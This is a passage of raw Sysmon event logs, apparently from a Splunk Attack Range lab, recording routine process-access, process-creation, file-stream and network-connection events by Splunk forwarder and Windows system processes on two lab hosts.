Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.923{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFF92714F3C1BE31C8776DFA5A9FBA04,SHA256=1313BF215295A69FC2F5BBCAD8B6BB7B01BDFDD3D08F3D52304C743ADDB11EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45965F2B70FFA4690D52C82E9EE36A9A,SHA256=3EB2956ABEBD5F4023476B08AC340A997AF1ADBA99B067AF58C0E2CEDB203253,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.251{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.236{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81CA9C706CF0619331108A90C08E9082,SHA256=1DAE2E924B7DE05A9918473046C7A43762ED04C1157C672F4CB5E0A14FF97E3D,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000806535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.782{0C1E0330-F353-60EB-4E79-00000000D001}15323664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:19.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50940-false10.0.1.12-8000- 23542300x80000000000000001046696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:27.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4791B6DB589BB11B9EDF48D7D77952A,SHA256=048FE4B697F6C918B019BD4CBF725B4CB5BD4AA06075A0150A0499BF83B8F281,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL